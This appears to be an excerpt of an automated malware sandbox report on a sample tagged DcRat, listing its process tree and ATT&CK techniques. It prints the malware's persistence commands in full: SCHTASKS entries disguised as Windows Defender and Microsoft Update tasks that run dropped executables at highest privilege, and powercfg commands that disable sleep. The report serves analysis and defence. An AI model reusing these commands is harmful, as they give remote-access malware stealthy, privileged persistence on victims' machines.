"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk50" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:3440

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk50" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:740

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk680" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:3668

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk680" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4792

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk611" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:4868

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk611" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:5052

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:4992

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:676

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
3⤵
PID:1144

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:3972

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk65" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3⤵
PID:5008

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk65" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4760

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4652

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4232

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1100

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3436

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4412

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
1⤵
- Executes dropped EXE
PID:1880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 4980 -ip 4980
1⤵
PID:2852

C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\8682d6c68d\nbveek.exe
1⤵
- Executes dropped EXE
PID:2148

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery